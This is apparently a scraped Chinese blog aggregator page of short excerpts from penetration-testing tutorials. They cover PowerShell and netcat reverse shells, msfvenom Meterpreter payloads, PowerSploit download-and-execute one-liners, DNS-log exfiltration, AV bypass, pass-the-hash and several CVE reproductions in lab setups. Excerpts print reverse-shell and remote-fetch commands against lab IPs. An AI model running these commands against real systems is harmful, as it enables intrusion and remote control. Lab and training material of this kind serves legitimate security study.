首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
powershell 反弹msf
2024-11-10
利用powershell反弹shell到metasploit
一.使用msfvenom生成PS1文件: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= -f psh-reflection >.ps1 二.开启msf监听: msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/meterprete
[Shell]Powershell反弹shell
原作者:Cream 文章出处: 贝塔安全实验室 0x01 Powershell反弹shell Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能.它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本. 一旦攻击者可以在一台计算机上运行代码,他们便可以下载powershell脚本文件(.ps1)到磁盘执行,脚本
PowerShell 反弹渗透技巧
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,并且与现有的WSH保持向后兼容,因此它的脚本程序不仅能访问.NET CLR,也能使用现有的COM技术,同时也包含了数种系统管理工具.简易且一致的语法,提升管理者的管理能力,自Windows 7 开始一直到Windows 10 包括服务器Windows Server 系统中,都将内置 PowerShell,其可作为白名单的一种绕过方式,也让渗透变得更加有趣
反弹Shell原理及检测技术研究
1. 反弹Shell的概念本质 所谓的反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端. 本文会先分别讨论: 命令执行(system executor) 网络通信(network api) 这两个基础原子概念,然后在之后的章节中用组合的方式来呈现现在主流的反弹shell技术方式及其原理,用这种横向和纵向拆分的方式来帮助读者朋友更好地理解反弹shell. 2. 网络通信(network api)方式讨论 0
2018-2019-2 20165215《网络对抗技术》Exp5 MSF基础应用
目录 实验内容 实验原理 实验步骤 (一)一个主动攻击实践 ms08_067(成功) (二)一个针对浏览器的攻击 ms14_064(成功) (三)一个针对客户端的攻击 Adobe(成功) CVE-2017-11882(成功且唯一) (四)应用辅助模块的攻击 sniffer(成功) 实验中遇到的问题 基础问题回答 离实战还缺些什么技术或步骤 实验内容 一个主动攻击实践,如ms08_067; 一个针对浏览器的攻击,如ms11_050: 一个针对客户端的攻击,如Adobe: 成功应用任何一个辅助模块.
Windows 反弹 Shell
NC 反弹 shell 攻击场景: Victim IP: 192.168.2.10 Attacker IP:192.168.2.11 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cmd服务,然后在攻击机上进行连接 反向 Shell Attacker:nc -vlp 9999 Victim:nc 192.168.2.11 999
各种反弹shell方法总结
获取shell的方法总结: shell分为两种,一种是正向shell,另一种是反向shell.如果客户端连接服务器,客户端主动连接服务器,就称为正向shell.如果客户端连接服务器,服务器想要获得客户端的shell,就称为反向shell. 反向shell通常在开启了防护措施的目标机器上,例如防火墙.端口转发等. (1)正向shell 输入如下命令,监听目标主机的4444端口 nc -lvp 4444 -e /bin/bash // linux nc -lvp 4444 -e c:\windows
后渗透阶段之基于MSF的路由转发
目录 反弹MSF类型的Shell 添加内网路由 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由,直接使用MSF去访问原本不能直接访问的内网资源,只要路由可达了那么我们使用MSF来进行探测了. 我们现在有下面这个环境: Web服务器通过端口映射,对外提供Web服务.Web服务器上有两张网卡,内网分别还有其他两台服务器,一台开放了http服务,一台开放了SMB服务.拓扑图如下: 反弹MSF
powersploit的用法
一.PowerSploit简介 PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察.权限提升.权限维持. Powershell的优点: 1.代码运行在内存中可以不去接触磁盘 2.从另一个系统中下载代码并执行 3.很多安全产品并不能监测到powershell的活动 4.cmd.exe通常被阻止运行,但是powershell不会 二.实验环境 Win7 搭建powersploit站点 ip:10.10.10.187 Win
微软.NET Framework cve-2017-8759 复现
0x00 漏洞前言 FireEye公司最近发现一份恶意微软Office RTF文档,其中利用到一项SOAP WSDL解析器代码注入漏洞——编号CVE-2017-8759.该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码.FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本. 0x01 漏洞复现 方法一:通过cve-2017-8759_toolk反弹msf 测试环境: 目标
powersploit使用实例
一.AntivirusBypass(绕过杀毒) Find-AVSignature 发现杀软的签名 1.先在靶机(windows 2008)上远程加载位于win7的Invoke-Shellcode.ps1脚本 iex(New-Object Net.WebClient).DownloadString("http://10.10.10.187/PowerSploit-master/AntivirusBypass/Find-AVSignature.ps1") 2.运行脚本,这里以之前的msf
【HTB系列】靶机Access的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台.它能帮助你提升渗透测试技能和黑盒测试技能,它包含了一些不断更新的挑战,其中有模拟真实世界场景,也有倾向于CTF风格的挑战. https://www.hackthebox.eu/ 平台上有很多靶机,从易到难,黑客每入侵一台机器都会获得相应积分,通过积分排名设有名人堂.今天要实验的是靶机Access. 一.获取普通用户权限
dnslog注入
使用Powershell反弹Meterpreter Shell cloudeye在windows下的应用 今天突发奇想的一个姿势,算不上什么技巧,分享一下吧. 看到有人问过.http://zone.wooyun.org/content/27440 其实很羡慕linxu的curl `whoami`.xxxxxx.dnslog.info这样去获取数据什么的. windows下面其实用命令也可以实现,不过还是有很多问题. 比如win下获取当前用户: whoami l3m0n3115\l3m0n 获取计
cve-2017-0199&metasploit复现过程
CVE-2017-0199 WORD/RTF嵌入OLE调用远程文件执行的一个漏洞.不需要用户交互.打开文档即中招 首先更新msf到最新,据说最新版简化了利用过程,不需要开启hta这一步.但没测成功 还是按老方法 更新msf,增加国内源 #清华大学 #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #deb-src https://mirrors.tuna.tsinghua.edu.cn
[原创]K8飞刀 新增Acunetix WVS 远程漏洞 反制黑客
工具: K8飞刀20150603组织: K8搞基大队[K8team]作者: K8拉登哥哥博客: http://qqhack8.blog.163.com发布: 2015/6/3 20:41:29 简介: K8飞刀是一款多功能的渗透测试工具.Hacker Swiss Army Knife. 图片: 可以构造指定网站 识别指定特征 精确打击 专搞黑阔K8_WVS漏洞扫描工具远程代码执行漏洞EXP 支持所有Windows系统Acunetix <=9.5 - OLE Automation Array Re
Dll劫持漏洞详解
一.dll的定义 DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型.在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中.当我们执行某一个程序时,相应的DLL文件就会被调用.一个应用程序可使用多个DLL文件,一个DLL文件也可能被不同的应用程序使用,这样的DLL文件被称为共享DLL文件. 如果在进程尝试加载一个DLL时没有指定DLL的绝对路径,那么Windows
渗透测试-基于白名单执行payload--Regsvr32
复现亮神课程 基于白名单执行payload--Regsvr32 0x01 Regsvr32 Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行.WinXP及以上系统的regsvr32.exe在windows\system32文件夹下:2000系统的regsvr32.exe在winnt\system32文件夹下.但搭配regsvr32.exe使用的 DLL,需要提供 DllRegisterServer 和 DllUnregi
域渗透-凭据传递攻击(pass the hash)完全总结
总结下PtH具体形式(wmicexec.powershell.msf等) 0x01 PtH攻击原理 && 黄金白银票据 PtH攻击原理 wiki https://en.wikipedia.org/wiki/Pass_the_hash 写的也很清楚 其中重要的是windows使用系统API(LsaLogonUser)生成hash进行认证,而不是用明文,所以利用hash即可模拟用户登录进行操作.还有的是如果密码长度大于15就不存在LM Hash,从windows2008开始微软默认禁用
vulstack红队评估(二)
一.环境搭建: 1.根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX 2.网络环境配置: ①Win2008双网卡模拟内外网: 外网:192.168.1.80,桥接模式与物理机相通 内网:10.10.10.80,仅主机模式 ②PC-win7只有内网: 内网:10.10.10.201,仅主机模式 ③win2012-DC只有内网: 内网:10.10.10.10,仅主机模式 启动web服务: 运行C:\Oracle\Middleware\user_projects\domains
Shiro 反序列化漏洞利用
环境搭建 docker pull medicean/vulapps:s_shiro_1 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1 # 80是指靶机端口,可随意修改 Windows安装模块:pip install pycryptodome 挖掘思路 判断漏洞 登录的时候发现 rememberMe 参数,判断是 shiro (外网可以访问的情况下)利用在线POC进行验证:http://sbd.ximcx.cn/ShiroRce/ 利用 P
热门专题
fastadmin日期时间段插件
/usr/bin/unzip 权限不够
iphone微信小程序授权登录无效
hive 中去掉空格,table键
使用keil5建立RT-thread nano
IHttpHandlerFactory 处理ashx
shader 动态雾
openstack keypair登录
vbnet MDI 判断已经关闭窗体
goodbye ok下载
linux tomcat配置jre环境
防火墙设置指定Ip公共网络下通过
java内存分页工具类
php 无限极分类一维数组转化为二维数组
UNity3D 同一场景多人协作插件
elementui按钮点击后不能重复点击
反向随机失活为什么除以keep_prob
hbase-site.xml文件在哪里
unity 鼠标发出射线检测
ubuntu配置apache php